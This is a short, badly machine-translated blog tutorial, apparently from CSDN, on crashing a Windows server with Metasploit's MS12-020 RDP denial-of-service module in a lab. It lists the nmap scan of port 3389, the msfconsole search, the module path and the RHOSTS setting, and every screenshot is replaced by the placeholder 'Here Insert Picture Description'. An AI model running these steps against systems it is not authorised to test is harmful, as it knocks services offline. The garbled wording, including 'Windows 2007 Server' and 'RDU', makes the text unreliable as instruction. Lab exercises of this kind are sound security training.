MSF use penetration testing framework to achieve a blue screen:

MSF use penetration testing framework to achieve a blue screen:

Experimental environment:
Attack: kali Linux
drone: Windows 2007 Server 2003 or Windows
1, nmap probe to ensure that the victims were open Remote Desktop Services (RDU) (port number: 3389), may also be connected with a remote computer try. Such as:
Here Insert Picture Description
detection results:
Here Insert Picture Description
2, opening into the attack machine --kali linux msfconsole
Here Insert Picture Description
. 3, open vulnerability scanning module:
Search # ms12-020 follows:

Here Insert Picture Description
4, we can see by querying several modules, through:
use Auxiliary / DOS / Windows / RDP / ms12_020_maxchannelids # into the module, the grammatical structure: use Module
Here Insert Picture Description
us: show options # query module inside the parameters:
Here Insert Picture Description
the SET rhosts victims set victims ip address ip #:
Here Insert Picture Description
rhosts victim # ip
rhport # target port
can be: not a good show options # query module inside the parameters set
5, began to attack using the exploit. Drone can see a blue screen:
Here Insert Picture Description
Here Insert Picture Description

Released three original articles · won praise 0 · Views 52

Guess you like

Origin blog.csdn.net/qq_41397071/article/details/104023981